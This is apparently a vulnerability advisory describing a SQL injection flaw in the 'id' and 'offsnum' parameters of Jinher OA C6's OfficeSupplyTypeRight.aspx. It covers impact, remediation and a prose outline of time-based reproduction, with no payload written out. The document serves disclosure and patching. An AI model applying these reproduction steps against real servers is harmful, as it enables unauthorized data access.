Jinher OA C6 SQL Injection Vulnerability in OfficeSupplyTypeRight.aspx
Vulnerability
A SQL injection vulnerability has been identified in Jinher OA C6 versions prior to 20260210. The issue arises in the OfficeSupplyTypeRight.aspx file, where user-controlled parameters 'id' and 'offsnum' are not properly sanitized, allowing attackers to manipulate the input and execute arbitrary SQL commands. This vulnerability can be exploited remotely, and an exploit is publicly available.
Impact
Exploitation of this vulnerability allows for SQL injection, where an attacker can execute malicious SQL queries. This could lead to unauthorized data access, data manipulation, or in some cases, executing commands on the server.
Reproduction
To reproduce this vulnerability, send a GET request to the OfficeSupplyTypeRight.aspx endpoint with the 'id' and 'offsnum' parameters. Include a crafted SQL payload that exploits the lack of input sanitization. The response can be observed for indications of successful exploitation, such as delays that suggest the execution of the injected SQL command.
Remediation
Users are advised to apply the available patch to address this vulnerability.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.